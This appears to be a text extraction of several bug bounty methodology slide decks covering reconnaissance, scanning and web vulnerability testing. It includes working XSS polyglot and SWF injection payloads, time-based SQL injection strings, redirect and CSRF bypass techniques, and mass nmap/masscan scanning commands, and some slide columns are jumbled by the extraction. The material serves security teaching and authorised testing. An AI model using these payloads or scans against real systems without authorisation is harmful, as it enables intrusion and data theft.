1ndianl33t Recon v1 PDF

How To Shot Web
(Better hacking in 2015)
1
whoami
Jason Haddix
● Bugcrowd
● Director of Technical Ops
● Hacker & Bug hunter
● #1 on all-time leaderboard bugcrowd 2014
@jhaddix
2
What this talk’s about...
Hack
Stuff
Better
(and practically)
And…LOTS of memes…. only some are funny
3
More Specifically
Step 1: Cut a hole in a box... j/k
Step 1: Started with my bug hunting methodology

Step 2: Parsed some of the top bug hunters’ research (web/mobile only for now)
Step 3: Create kickass preso
Topics? BB philosophy shifts, discovery

techniques, mapping methodology, parameters
oft attacked, useful fuzz strings, bypass or filter
4 evasion techniques, new/awesome tooling
Philosophy
5
Differences from standard testing
Single-sourced Crowdsourced
● looking mostly for ● looking for vulns that
common-ish vulns aren’t as easy to find
● not competing with ● racing vs. time
others ● competitive vs. others
● incentivized for count ● incentivized to find
● payment based on sniff unique bugs
test ● payment based on
impact not number of
findings
6
The regular methodologies
7
Discovery
8
Find the road less traveled
^ means find the application (or parts of an
application) less tested.
1. *.acme.com scope is your friend
2. Find domains via Google (and others!)
a. Can be automated well via recon-ng
and other tools.
3. Port scan for obscure web servers or
services (on all domains)
4. Find acquisitions and the bounty
acquisition rules
a. Google has a 6 month rule
5. Functionality changes or re-designs
6. Mobile websites
9 7. New mobile app versions
Tool: Recon-ng script (enumall.sh)
10 https://github.com/jhaddix/domain
11
LMGTFY
12
LMGTFY
13
14
https://www.facebook.com/notes/phwd/facebook-bug-bounties/707217202701640
15
Port Scanning!
Port scanning is not just for Netpen!
A full port scan of all your new found targets will usually
yield #win:
● separate webapps
● extraneous services
● Facebook had Jenkins Script console with no auth
● IIS.net had rdp open vulnerable to MS12_020
nmap -sS -A -PN -p- --script=http-title dontscanme.bro
^ syn scan, OS + service fingerprint, no ping, all ports,

16
http titles
Mapping
17
Mapping tips
● Google
● *Smart* Directory Brute Forcing
● RAFT lists (included in Seclists)
● SVN Digger (included in Seclists)
● Git Digger
● Platform Identification:
● Wapplyzer (Chrome)
● Builtwith (Chrome)
● retire.js (cmd-line or Burp)
● Check CVE’s
● Auxiliary
● WPScan
● CMSmap
18
Directory Bruteforce Workflow
After bruteforcing look for other status codes indicating you are denied or require auth then
append list there to test for misconfigured access control.
Example:
GET http://www.acme.com - 200

GET http://www.acme.com/backlog/ - 404
GET http://www.acme.com/controlpanel/ - 401 hmm.. ok
GET http://www.acme.com/controlpanel/[bruteforce here now]
19
Mapping/Vuln Discovery using OSINT
Find previous/existing problem:
● Xssed.com
● Reddit XSS - /r/xss
● Punkspider
● xss.cx
● xssposed.org
● twitter searching
● ++
Issues might already reported but use the flaw area
and injection type to guide you to further injections or
filter bypass.
20
Intrigue
New OSINT/Mapping project, intrigue:
● 250+ bounty programs

● Crawl
● DNS info + bruteforce
● Bounty metadata (links, rewards, scope)
● API
21
22
Intrigue and Maps projects
New OSINT/Mapping project, intrigue:
● 250+ bounty programs

● Crawl
● DNS info + bruteforce
● Bounty metadata (links, rewards, scope)
● API
23
Crawling
Using + Ruby + Anemone + JSON + Grep
$cat test_target_json.txt | grep redirect
https://test_target/redirect/?url=http://twitter.com/...
https://test_target/redirect/?url=http://facebook.com/...
https://test_target/redirect/?url=http://pinterest.com/...
24
Intrigue Tasks
Using + Ruby + Anemone + JSON + Grep
● Brute force
● Spider
● Nmap
● etc
25
26
27
Auth and Session
28
Auth (better be quick)
Auth Related (more in logic, priv, and transport sections)
● User/pass discrepancy flaw

● Registration page harvesting
● Login page harvesting
● Password reset page harvesting
● No account lockout
● Weak password policy
● Password not required for account updates
● Password reset tokens (no expiry or re-use)
29
Session (better be quick)
Session Related
● Failure to invalidate old cookies

● No new cookies on login/logout/timeout
● Never ending cookie length
● Multiple sessions allowed
● Easily reversible cookie (base64 most often)
30
Tactical Fuzzing - XSS
31
XSS
Core Idea: Does the page functionality display something to the users?
For time sensitive testing the 80/20 rule

applies. Many testers use Polyglot payloads.
You probably have too!
32
XSS
';alert(String.fromCharCode(88,83,83))//';alert(String.
fromCharCode(88,83,83))//";alert(String.fromCharCode
(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))
</SCRIPT>
Multi-context, filter bypass based polyglot payload #1 (Rsnake XSS Cheat Sheet)
33
XSS
'">><marquee><img src=x onerror=confirm(1)></marquee>"
></plaintext\></|\><plaintext/onmouseover=prompt(1)
><script>prompt(1)</script>@gmail.com<isindex
formaction=javascript:alert(/XSS/) type=submit>'-->"
></script><script>alert(1)</script>"><img/id="confirm(
1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http:
//i.imgur.com/P8mL8.jpg">
34
Multi-context, filter bypass based polyglot payload #2 (Ashar Javed XSS Research)
XSS
“ onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
Multi-context, filter bypass based polyglot payload #3 (Mathias Karlsson)
35
Other XSS Input Vectors
Observations Customizable Themes & Profiles via CSS
Event or meeting names
URI based
Imported from a 3rd party (think Facebook integration)
JSON POST Values (check returning content type)
File Upload names
Uploaded files (swf, HTML, ++)
Custom Error pages
fake params - ?realparam=1&foo=bar’+alert(/XSS/)+’
Login and Forgot password forms

36
SWF Parameter XSS
Common Params:
Common Params:
onload, allowedDomain, movieplayer, xmlPath, eventhandler, callback (more on OWASP page)
Common Injection Strings:
\%22})))}catch(e){alert(document.domain);}//
"]);}catch(e){}if(!self.a)self.a=!alert(document.domain);//
"a")(({type:"ready"}));}catch(e){alert(1)}//
37
SWF Parameter XSS
38
Tactical Fuzzing - SQLi
39
SQL Injection
Core Idea: Does the page look like it might need to call on stored data?
There exist some SQLi polyglots, i.e;
SLEEP(1) /*‘ or SLEEP(1) or ‘“ or SLEEP(1) or “*/
Works in single quote context, works in double quote context, works in “straight into query”
context! (Mathias Karlsson)
40
SQL Injection
You can also leverage the large database of
fuzzlists from Seclists here:
41
SQL Injection Observations
Common Parameters or Injection points
Blind is predominant, Error based is highly unlikely.
ID
‘%2Bbenchmark(3200,SHA1(1))%2B’ Currency Values

‘+BENCHMARK(40000000,SHA1(1337))+’ Item number values
SQLMap is king! sorting parameters (i.e order, sort, etc)
JSON and XML values

● Use -l to parse a Burp log file.
● Use Tamper Scripts for blacklists. Cookie values (really?)
● SQLiPy Burp plugin works well to instrument SQLmap quickly.
Custom headers (look for possible
Lots of injection in web services! integrations with CDN’s or WAF’s)
REST based Services

42
SQLmap SQLiPy
43
Best SQL injection resources
DBMS Specific Resources
mySQL PentestMonkey's mySQL injection cheat sheet
Reiners mySQL injection Filter Evasion Cheatsheet
MSSQL EvilSQL's Error/Union/Blind MSSQL Cheatsheet
PentestMonkey's MSSQL SQLi injection Cheat Sheet
ORACLE PentestMonkey's Oracle SQLi Cheatsheet
POSTGRESQL PentestMonkey's Postgres SQLi Cheatsheet
Others Access SQLi Cheatsheet

PentestMonkey's Ingres SQL Injection Cheat Sheet
pentestmonkey's DB2 SQL Injection Cheat Sheet
pentestmonkey's Informix SQL Injection Cheat Sheet
SQLite3 Injection Cheat sheet
Ruby on Rails (Active Record) SQL Injection Guide
44
Tactical Fuzzing - FI & Uploads
45
Local file inclusion
Core Idea: Does it (or can it) interact with the server file system?
Liffy is new and cool here but you can also use Seclists: Common Parameters or Injection points
file=
location=
locale=
path=
display=
load=
read=
46 retrieve=
Malicious File Upload ++
This is an important and common attack vector in this type of testing
A file upload functions need a lot of protections to be adequately secure.
Attacks:
● Upload unexpected file format to achieve code exec (swf, html, php, php3, aspx, ++) Web
shells or...
● Execute XSS via same types of files. Images as well!
● Attack the parser to DoS the site or XSS via storing payloads in metadata or file header
● Bypass security zones and store malware on target site via file polyglots
47
File upload attacks are a whole presentation. Try this one to get a feel for bypass techniques:
● content type spoofing

● extension trickery
● File in the hole! presentaion - http://goo.gl/VCXPh6
48
As referenced file polyglots can be used

to store malware on servers!
See @dan_crowley ‘s talk: http://goo.

gl/pquXC2
and @angealbertini research: corkami.

com
49
Remote file includes and redirects
Look for any param with another web address Redirections Common Parameters or Injection
points
in it. Same params from LFI can present here too.
dest=
Common blacklist bypasses: continue=

● escape "/" with "\/" or “//” with “\/\/”
redirect=
● try single "/" instead of "//"
● remove http i.e. "continue=//google.com" url= (or anything with “url” in it)
● “/\/\” , “|/” , “/%09/”
● encode, slashes uri= (same as above)
● ”./” CHANGE TO “..//”
● ”../” CHANGE TO “….//” window=
● ”/” CHANGE TO “//”
next=
50
Remote file includes and redirects
RFI Common Parameters or Injection points
File= document=
Folder= root=
Path= pg=
style= pdf=
template=
php_path=
51
doc=
CSRF
52
CSRF
Everyone knows CSRF but the TLDR
here is find sensitive functions and
attempt to CSRF.
Burps CSRF PoC is fast and easy for

this:
53
CSRF
Many sites will have CSRF protection, focus on CSRF bypass!
Common bypasses:
● Remove CSRF token from request

● Remove CSRF token parameter value
● Add bad control chars to CSRF parameter value
● Use a second identical CSRF param
● Change POST to GET
Check this out...

54
CSRF
Debasish Mandal wrote a python tool to automate finding CSRF bypasses called
Burpy.
Step 1: Enable logging in Burp. Crawl a site with Burp completely executing all
functions.
Step 2: Create a template...
55
56
CSRF
Step 3: Run burpy on Burp log file..
Logic:
1. Parse burp log file

2. re-request everything instrumenting
4/5 attacks in previous slide
3. diff responses
4. alert on outliers
5. profit
57
58
59
CSRF
Or focus on pages without the token in Burp:
https://github.
com/arvinddoraiswamy/mywebappscripts/blob/master/BurpExtensions/csrf_token_d
etect.py
60
CSRF
CSRF Common Critical functions
Add / Upload file Password change
Email change Transfer Money /

Currency
Delete File Profile edit
61
Privilege, Transport, Logic
62
Privilege
Often logic, priv, auth bugs are blurred.
Testing user priv:
1. admin has power

2. peon has none
3. peon can use function only meant for
admin
63
Privilege
1. Find site functionality that is restricted to certain Common Functions or Views
user types Add user function
2. Try accessing those functions with lesser/other
Delete user function
user roles
3. Try to directly browse to views with sensitive start project / campaign / etc function
information as a lesser priv user
change account info (pass, CC, etc) function
customer analytics view

Autorize Burp plugin is pretty neat here...
payment processing view
https://github.com/Quitten/Autorize any view with PII
64
1. Browse using high priv user
2. Login with a lower priv user
3. Burp Plugin re-requests to see if low priv can access high priv
65
Insecure direct object references
IDORs are common place in bounties, and hard
to catch with scanners.
Find any and all UIDs

● increment
● decrement
● negative values
● Attempt to perform sensitive functions
substituting another UID
○ change password
○ forgot password
○ admin only functions
66
Idor’s
Common Functions , Views, or Files
Everything from the CSRF Table, trying cross account attacks
Sub: UIDs, user hashes, or emails
Images that are non-public
Receipts
Private Files (pdfs, ++)
Shipping info & Purchase Orders
Sending / Deleting messages
67
68
Transport
Most security concerned sites will enable HTTPs. It’s
your job to ensure they’ve done it EVERYWHERE. Most
of the time they miss something.
Examples:
● Sensitive images transported over HTTP

● Analytics with session data / PII leaked over HTTP
69
Transport
https://github.com/arvinddoraiswamy/mywebappscripts/tree/master/ForceSSL
70
Logic
Logic flaws that are tricky, mostly manual:
● substituting hashed parameters

● step manipulation
● use negatives in quantities
● authentication bypass
● application level DoS
● Timing attacks
71
Mobile
72
Data Storage
Its common to see mobile apps not applying

encryption to the files that store PII. Common places to find PII unencrypted
Phone system logs (avail to all apps)
webkit cache (cache.db)
plists, dbs, etc
hardcoded in the binary
73
Quick spin-up for iOS
Daniel Mayers idb tool:
74
Logs!
75
Auxiliary
76
The vulns formerly known as “noise”
● Content Spoofing or HTML injection
● Referer leakage
● security headers
● path disclosure
● clickjacking
● ++
77
How to test a web app in n minutes
How can you get maximum results within a
given time window?
78
Data Driven Assessment (diminishing return FTW)
1. Visit the search, registration, contact, and password reset, and comment
forms and hit them with your polyglot strings
2. Scan those specific functions with Burp’s built-in scanner
3. Check your cookie, log out, check cookie, log in, check cookie. Submit old
cookie, see if access.
4. Perform user enumeration checks on login, registration, and password
reset.
5. Do a reset and see if; the password comes plaintext, uses a URL based
token, is predictable, can be used multiple times, or logs you in
automatically
6. Find numeric account identifiers anywhere in URL and rotate them for
context change
7. Find the security-sensitive function(s) or files and see if vulnerable to
non-auth browsing (idors), lower-auth browsing, CSRF, CSRF protection
bypass, and see if they can be done over HTTP.
8. Directory brute for top short list on SecLists
9. Check upload functions for alternate file types that can execute code (xss
or php/etc/etc)
79
~ 15 minutes
Things to take with you…
1. Crowdsourced testing is different enough to pay attention to
2. Crowdsourcing focuses on the 20% because the 80% goes quick
3. Data analysis can yield the most successfully attacked areas
4. A 15 minute web test, done right, could yield a majority of your critical vulns
5. Add polyglots to your toolbelt
6. Use SecLists to power your scanners
7. Remember to periodically refresh your game with the wisdom of other techniques and
other approaches
Follow these ninjas who I profiled: https://twitter.com/Jhaddix/lists/bninjas
80
Gitbook project: The Bug Hunters Methodology
This preso ended up to be way too much to fit in an 45min talk so... we turned it into a Git
project! (if you are reading this from the Defcon DVD check my twitter or Github for linkage)
● 50% of research still unparsed

● More tooling to automate
● XXE and parser attacks
● XSRF
● Captcha bypass
● Detailed logic flaws
● More mobile
81
Meme Count:
13
82
Attribution and Thanks
83
Tim Tomes - Recon-ng
Joe Giron - RFI params
Soroush Dalili - File in the Hole preso
Mathias Karlsson - polyglot research
Ashar Javed - polyglot/xss research
Ryan Dewhurst & Wpscan Team
Bitquark - for being a ninja, bsqli string
rotlogix - liffy LFI scanner
Arvind Doraiswamy - HTTPs, CSRF Burp Plugins
Barak Tawily - Autorize burp plugin
the RAFT list authors
Ferruh Mavituna - SVNDigger
Jaime Filson aka wick2o - GitDigger
Robert Hansen aka rsnake - polyglot / xss
Dan Crowley - polyglot research
Daniel Miessler - methodology, slide, and data contributions
My awesome team at Bugcrowd (Jon, Tod, Shpend, Ben, Grant, Fatih, Patrik, Kati, Kym, Abby, Casey, Chris, Sam, ++)
84
All the bug hunting community!!!
Domain Discovery
Expanding your scope like a boss
whoami
★ Jason Haddix - @jhaddix

★ Head of Trust and Security @Bugcrowd
★ 2014-2015 top hunter on Bugcrowd (9 currently)
★ Father, hacker, blogger, gamer!
Domain Domain Permutation
Identify IPs bruteforcing, Visual
scraping for scanning &
and main TLDs Resolve && add Identification
discovered TLDs new IP ranges Portscan
ASNs Altdns
Reverse Whois
enumall
Acquisitions sublist3r Massdns Sdbf
nmap eyewitness
Trademarks Brutesubs Manual
Shodan ++ masscan
++
Platform Content Parameter

AUXiliary
Identification Discovery discovery
Builtwith
spider Wappalyzer Gobuster
Parameth
Github Vulners Burp Wordlists
Burp analyze target
++ Plugin Burp
++
ASN’s
★ autonomous system number - http://bgp.he.net

ARIN & RIPE
★ https://whois.arin.net/ui/query.do
★ https://apps.db.ripe.net/db-web-ui/#/fulltextsearch
Rev whois
★ http://viewdns.info/
★ http://domainbigdata.com/
Rev whois
★ https://reverse.report/
Acquisitions
★ Crunchbase
★ Protected by
distil bot
protection
★ Stay tuned
Shodan Organization
★ https://www.shodan.io/search?query
=org%3A%22Tesla+Motors%22
Others
★ Trademark In Google: ” "Tesla © 2016" "Tesla © 2015" "Tesla © 2017" inurl:tesla.com
★ Google Analytics/tag searching:

Sub Scraping
crt.sh
Google Certificate Transparency
OpenSSL SAN (Subject Alternative Name)

Sub Scraping
recon-ng/enumall Both sublist3r

ssltools.com API Google (Recon-ng now handles captcha) Baidu
HackerTarget.com API Bing Ask
Shodan Crt.sh DNSDumpster (scans.io)
ThreatCrowd Virustotal
Zoomeye (not core) Netcraft Ptrarchive.com
Threatcrowd regged by email (not core)
Zone transfer (not core)
RiskIQ API (not core)
Censys.io (not core)

Scraping - Sublist3r
★ Some configuration required
○ Update Docker IMage with non core
recon-ng modules
○ .env file
○ Disable Bruteforce (see why next...)
Sub Scraping (bespoke)
★ Cloudflare
★ Censys.io
★ Haven't tested but love
the ideas
Sub Bruting
1,136,964 line subdomain dictionary (all.txt)

Tool Time to run Threads Found
subbrute errored 100 0

time ./subbrute.py -c 100 all.txt $TARGET.com | tee subbrute.output
gobuster 21m15.857s 100 87

time gobuster -m dns -u $TARGET.com -t 100 -w all.txt
massdns 1m24.167 n/a 213

time ./subbrute.py /root/work/bin/all.txt $TARGET.com | ./bin/massdns -r resolvers.txt -t A -a -o -w massdns_output.txt -
dns-parallel-prober 42m2.868s 100 43

time python dns-queue.py $TARGET.com 100 $TARGET_outputfile -i /root/work/bin/all.txt
blacksheepwall 256m9.385s 100 61

time ./blacksheepwall_linux_amd64 -clean -dictionary /root/work/bin/all.txt -domain $TARGET.com
Sub Bruting
With Massdns, why not all of them?
all.txt
https://gist.github.com/jhaddix/86a06c5dc309d085
80a018c66354a056
Permutation Scanning
Altdns : https://github.com/infosec-au/altdns
Permutation Scanning
SDBF: Smart DNS Brute-Forcer approach is

based on techniques derived from natural
language modeling and leverage Markov
Chain Models in order to build the first DNS
scanner (SDBF) that is leveraging both,
training and advanced language modeling
approaches.
https://github.com/jfrancois/SDBF
https://www.foo.be/papers/sdbf.pdf
Port Scanning
65536 unverified Hosts (a large targets ASN)
Tool Time to run Found
masscan
masscan
You can use a conf file for this! 11m4.164s 196
-p1,3-4,6-7,9,13,17,19-26,30,32-33,37,42-43,49,53,70,79-85,88-90,99-100,106,109-111,113,119,125,135,139,143-144,146,161,163,179,199,211-212,222,254-256,259,264,280,301,306,311,
340,366,389,406-407,416-417,425,427,443-445,458,464-465,481,497,500,512-515,524,541,543-545,548,554-555,563,587,593,616-617,625,631,636,646,648,666-668,683,687,691,700,705
,711,714,720,722,726,749,765,777,783,787,800-801,808,843,873,880,888,898,900-903,911-912,981,987,990,992-993,995,999-1002,1007,1009-1011,1021-1100,1102,1104-1108,1110-111
4,1117,1119,1121-1124,1126,1130-1132,1137-1138,1141,1145,1147-1149,1151-1152,1154,1163-1166,1169,1174-1175,1183,1185-1187,1192,1198-1199,1201,1213,1216-1218,1233-1234,
1236,1244,1247-1248,1259,1271-1272,1277,1287,1296,1300-1301,1309-1311,1322,1328,1334,1352,1417,1433-1434,1443,1455,1461,1494,1500-1501,1503,1521,1524,1533,1556,1580,15
83,1594,1600,1641,1658,1666,1687-1688,1700,1717-1721,1723,1755,1761,1782-1783,1801,1805,1812,1839-1840,1862-1864,1875,1900,1914,1935,1947,1971-1972,1974,1984,1998-2010
,2013,2020-2022,2030,2033-2035,2038,2040-2043,2045-2049,2065,2068,2099-2100,2103,2105-2107,2111,2119,2121,2126,2135,2144,2160-2161,2170,2179,2190-2191,2196,2200,2222,2
251,2260,2288,2301,2323,2366,2381-2383,2393-2394,2399,2401,2492,2500,2522,2525,2557,2601-2602,2604-2605,2607-2608,2638,2701-2702,2710,2717-2718,2725,2800,2809,2811,286
9,2875,2909-2910,2920,2967-2968,2998,3000-3001,3003,3005-3007,3011,3013,3017,3030-3031,3052,3071,3077,3128,3168,3211,3221,3260-3261,3268-3269,3283,3300-3301,3306,3322-
3325,3333,3351,3367,3369-3372,3389-3390,3404,3476,3493,3517,3527,3546,3551,3580,3659,3689-3690,3703,3737,3766,3784,3800-3801,3809,3814,3826-3828,3851,3869,3871,3878,38
80,3889,3905,3914,3918,3920,3945,3971,3986,3995,3998,4000-4006,4045,4111,4125-4126,4129,4224,4242,4279,4321,4343,4443-4446,4449,4550,4567,4662,4848,4899-4900,4998,5000
-5004,5009,5030,5033,5050-5051,5054,5060-5061,5080,5087,5100-5102,5120,5190,5200,5214,5221-5222,5225-5226,5269,5280,5298,5357,5405,5414,5431-5432,5440,5500,5510,5544,5
550,5555,5560,5566,5631,5633,5666,5678-5679,5718,5730,5800-5802,5810-5811,5815,5822,5825,5850,5859,5862,5877,5900-5904,5906-5907,5910-5911,5915,5922,5925,5950,5952,595
9-5963,5987-5989,5998-6007,6009,6025,6059,6100-6101,6106,6112,6123,6129,6156,6346,6389,6502,6510,6543,6547,6565-6567,6580,6646,6666-6669,6689,6692,6699,6779,6788-6789,
6792,6839,6881,6901,6969,7000-7002,7004,7007,7019,7025,7070,7100,7103,7106,7200-7201,7402,7435,7443,7496,7512,7625,7627,7676,7741,7777-7778,7800,7911,7920-7921,7937-79
38,7999-8002,8007-8011,8021-8022,8031,8042,8045,8080-8090,8093,8099-8100,8180-8181,8192-8194,8200,8222,8254,8290-8292,8300,8333,8383,8400,8402,8443,8500,8600,8649,8651
-8652,8654,8701,8800,8873,8888,8899,8994,9000-9003,9009-9011,9040,9050,9071,9080-9081,9090-9091,9099-9103,9110-9111,9200,9207,9220,9290,9415,9418,9485,9500,9502-9503,9
535,9575,9593-9595,9618,9666,9876-9878,9898,9900,9917,9929,9943-9944,9968,9998-10004,10009-10010,10012,10024-10025,10082,10180,10215,10243,10566,10616-10617,10621,10
626,10628-10629,10778,11110-11111,11967,12000,12174,12265,12345,13456,13722,13782-13783,14000,14238,14441-14442,15000,15002-15004,15660,15742,16000-16001,16012,1601
6,16018,16080,16113,16992-16993,17877,17988,18040,18101,18988,19101,19283,19315,19350,19780,19801,19842,20000,20005,20031,20221-20222,20828,21571,22939,23502,24444,2
4800,25734-25735,26214,27000,27352-27353,27355-27356,27715,28201,30000,30718,30951,31038,31337,32768-32785,33354,33899,34571-34573,35500,38292,40193,40911,41511,425
10,44176,44442-44443,44501,45100,48080,49152-49161,49163,49165,49167,49175-49176,49400,49999-50003,50006,50300,50389,50500,50636,50800,51103,51493,52673,52822,52848
,52869,54045,54328,55055-55056,55555,55600,56737-56738,57294,57797,58080,60020,60443,61532,61900,62078,63331,64623,64680,65000,65129,65389,280,4567,7001,8008,9080 -iL
$TARGET_LIST --max-rate 100000 -oG $TARGET_OUTPUT
nmap zzz
∞
Visual Identification
★ Because of the nature of scraping and dns redirects some sites will
be gone or the same.
★ Gotta get an idea of what is up and unique
★ We also don’t know what protocol these are on (http vs https, ++)
Auxiliary
★ Dnssec / nsec / nsec3 walking
○ Ldnsutils, nsec3walker, nsec3map
★ Github recon
https://github.com/appsecco/bugcrowd-levelup-subdomain-enum
○ Search for goodies eration/blob/master/esoteric_subdomain_enumeration_techni
ques.pdf
★ Burp suite scope filters
https://www.youtube.com/watch?v=1Kg0_53ZEq8
○ Simple and effective
○ Start with target, spider, scope down to
keywords, repeat
★ Dorking: ads key, priv pol, tos, aws, s3
Linked Discovery - BURP SUITE (DEMO)
Platform Identification
and CVE searching
Content Discovery /
Directory Bruting
❏ Seclists / RAFT / Digger wordlists

❏ Patator
❏ WPScan
❏ cmsmap
★ Gobuster
★ Burp content discovery
★ Robots disallowed
★ ¯\_(ツ)_/¯
Parameter Bruting?
★ Yep! - Untested but love the idea
★ Can be combined with backslash scanners top 2500 params
Automation?
★ Somewhat
★ Best-in-breed tools/sites change,
automation needs to support bespoke tooling
★ HODOR:
○ A security testing Slackbot built with a
Kubernetes backend on the Google Cloud
Platform
★ Kubebot:
○ A security testing Slackbot built with a
Kubernetes backend on the Google Cloud
Platform
★ Assetnote
★ Datasploit & intrigue
QUICK BASH WINS (hostme.sh)
QUICK BASH WINS (rundns.sh)
QUICK BASH WINS (bust.sh)
QUICK BASH WINS (mass.sh)
QUICK BASH WINS (certspotter.sh)
#!/bin/bash
#curl https://certspotter.com/api/v0/certs\?domain\=$1 | jq '.[].dns_names[]' | sed

's/\"//g' | sed 's/\*\.//g' | uniq | dig +short -f - | uniq | nmap -T5 -Pn -sS -i - -p
80,443,21,22,8080,8081,8443 --open -n -oG -
#curl https://certspotter.com/api/v0/certs\?domain\=luminate.com | jq '.[].dns_names[]'

| sed 's/\"//g' | sed 's/\*\.//g' | uniq | dig +short -f - | uniq | nmap -T5 -Pn -sS -i
- -p 80,443,21,22,8080,8081,8443 --open -n -oG -
curl https://certspotter.com/api/v0/certs\?domain\=$1 | jq '.[].dns_names[]' | sed

's/\"//g' | sed 's/\*\.//g' | uniq
Ty Jobert!
The Bug Hunters
Methodology v2.1
whoami

★ VP of Trust and Security @Bugcrowd
★ 2014-2015 top hunter on Bugcrowd (Top 20 currently)
What this talk is about...
Hack
Stuff
Better
(and practically)
And…LOTS of memes…. only some are funny
history && topics
★ philosophy shifts
Aka “How to Shot Web” @ DEFCON23
★ discovery techniques ★ Subdomain & Discovery
★ mapping methodology ★ SQLi
★ parameters oft attacked ★ XSS
★ useful fuzz strings ★ File Uploads
★ bypass or filter evasion techniques ★ CSRF
★ new/awesome tooling ★ Privilege, Auth, IDOR
★ memes
v2
★ MOAR discovery
★ xss ★ Infrastructure and config
★ ssti ★ WAF
★ ssrf ★ SOAP Testing
★ Code Inj / cmdi /
advancements in
fuzzing
light reading
Discovering New Targets
Discovery
TBHMv1 ★ (sub Scraping)Sublist3r

❏ Intro to scraping for subdomains ○ brutesubs
❏ Enumall (recon-ng, Alt-DNS wrapper) ★ (sub bruting) MaSSDNS ++
❏ Nmap Standard ○ all.txt list
★ (port scanning) MASSCAN ++
○ Asn + nmap style
Sublist3r
Sublist3r
★ Plazmaz Fork
★ Fleetcaptain fork
Sublist3r
★ Fleetcaptain fork
Sub Scraping
recon-ng/enumall Both sublist3r

ssltools.com API Google (Recon-ng now handles captcha) Baidu
HackerTarget.com API Bing Ask
Shodan Crt.sh DNSDumpster (scans.io)
ThreatCrowd Virustotal
Zoomeye (not core) Netcraft Ptrarchive.com
Threatcrowd regged by email (not core)
Zone transfer (not core)
RiskIQ API (not core)
Censys.io (not core)

★ Some configuration required
○ Update Docker IMage with non core
recon-ng modules
○ .env file
○ Disable Bruteforce (see why next...)
Sub Scraping (bespoke)
★ Cloudflare
★ Censys.io
★ Haven't tested but love
the ideas
Sub Bruting
1,136,964 line subdomain dictionary (all.txt)

Tool Time to run Threads Found

gobuster 21m15.857s 100 87




Sub Bruting
With Massdns, why not all of them?
all.txt
80a018c66354a056
Acquisitions
★ Crunchbase
★ wikipedia
Port Scanning
masscan 11m4.164s 196

masscan
-p1,3-4,6-7,9,13,17,19-26,30,32-33,37,42-43,49,53,70,79-85,88-90,99-100,106,109-111,113,119,125,135,139,143-144,146,161,163,179,199,211-212,222,254-256,259,264,280,301,306,311,
340,366,389,406-407,416-417,425,427,443-445,458,464-465,481,497,500,512-515,524,541,543-545,548,554-555,563,587,593,616-617,625,631,636,646,648,666-668,683,687,691,700,705
,711,714,720,722,726,749,765,777,783,787,800-801,808,843,873,880,888,898,900-903,911-912,981,987,990,992-993,995,999-1002,1007,1009-1011,1021-1100,1102,1104-1108,1110-111
4,1117,1119,1121-1124,1126,1130-1132,1137-1138,1141,1145,1147-1149,1151-1152,1154,1163-1166,1169,1174-1175,1183,1185-1187,1192,1198-1199,1201,1213,1216-1218,1233-1234,
1236,1244,1247-1248,1259,1271-1272,1277,1287,1296,1300-1301,1309-1311,1322,1328,1334,1352,1417,1433-1434,1443,1455,1461,1494,1500-1501,1503,1521,1524,1533,1556,1580,15
83,1594,1600,1641,1658,1666,1687-1688,1700,1717-1721,1723,1755,1761,1782-1783,1801,1805,1812,1839-1840,1862-1864,1875,1900,1914,1935,1947,1971-1972,1974,1984,1998-2010
,2013,2020-2022,2030,2033-2035,2038,2040-2043,2045-2049,2065,2068,2099-2100,2103,2105-2107,2111,2119,2121,2126,2135,2144,2160-2161,2170,2179,2190-2191,2196,2200,2222,2
251,2260,2288,2301,2323,2366,2381-2383,2393-2394,2399,2401,2492,2500,2522,2525,2557,2601-2602,2604-2605,2607-2608,2638,2701-2702,2710,2717-2718,2725,2800,2809,2811,286
9,2875,2909-2910,2920,2967-2968,2998,3000-3001,3003,3005-3007,3011,3013,3017,3030-3031,3052,3071,3077,3128,3168,3211,3221,3260-3261,3268-3269,3283,3300-3301,3306,3322-
3325,3333,3351,3367,3369-3372,3389-3390,3404,3476,3493,3517,3527,3546,3551,3580,3659,3689-3690,3703,3737,3766,3784,3800-3801,3809,3814,3826-3828,3851,3869,3871,3878,38
80,3889,3905,3914,3918,3920,3945,3971,3986,3995,3998,4000-4006,4045,4111,4125-4126,4129,4224,4242,4279,4321,4343,4443-4446,4449,4550,4567,4662,4848,4899-4900,4998,5000
-5004,5009,5030,5033,5050-5051,5054,5060-5061,5080,5087,5100-5102,5120,5190,5200,5214,5221-5222,5225-5226,5269,5280,5298,5357,5405,5414,5431-5432,5440,5500,5510,5544,5
550,5555,5560,5566,5631,5633,5666,5678-5679,5718,5730,5800-5802,5810-5811,5815,5822,5825,5850,5859,5862,5877,5900-5904,5906-5907,5910-5911,5915,5922,5925,5950,5952,595
9-5963,5987-5989,5998-6007,6009,6025,6059,6100-6101,6106,6112,6123,6129,6156,6346,6389,6502,6510,6543,6547,6565-6567,6580,6646,6666-6669,6689,6692,6699,6779,6788-6789,
6792,6839,6881,6901,6969,7000-7002,7004,7007,7019,7025,7070,7100,7103,7106,7200-7201,7402,7435,7443,7496,7512,7625,7627,7676,7741,7777-7778,7800,7911,7920-7921,7937-79
38,7999-8002,8007-8011,8021-8022,8031,8042,8045,8080-8090,8093,8099-8100,8180-8181,8192-8194,8200,8222,8254,8290-8292,8300,8333,8383,8400,8402,8443,8500,8600,8649,8651
-8652,8654,8701,8800,8873,8888,8899,8994,9000-9003,9009-9011,9040,9050,9071,9080-9081,9090-9091,9099-9103,9110-9111,9200,9207,9220,9290,9415,9418,9485,9500,9502-9503,9
535,9575,9593-9595,9618,9666,9876-9878,9898,9900,9917,9929,9943-9944,9968,9998-10004,10009-10010,10012,10024-10025,10082,10180,10215,10243,10566,10616-10617,10621,10
626,10628-10629,10778,11110-11111,11967,12000,12174,12265,12345,13456,13722,13782-13783,14000,14238,14441-14442,15000,15002-15004,15660,15742,16000-16001,16012,1601
6,16018,16080,16113,16992-16993,17877,17988,18040,18101,18988,19101,19283,19315,19350,19780,19801,19842,20000,20005,20031,20221-20222,20828,21571,22939,23502,24444,2
4800,25734-25735,26214,27000,27352-27353,27355-27356,27715,28201,30000,30718,30951,31038,31337,32768-32785,33354,33899,34571-34573,35500,38292,40193,40911,41511,425
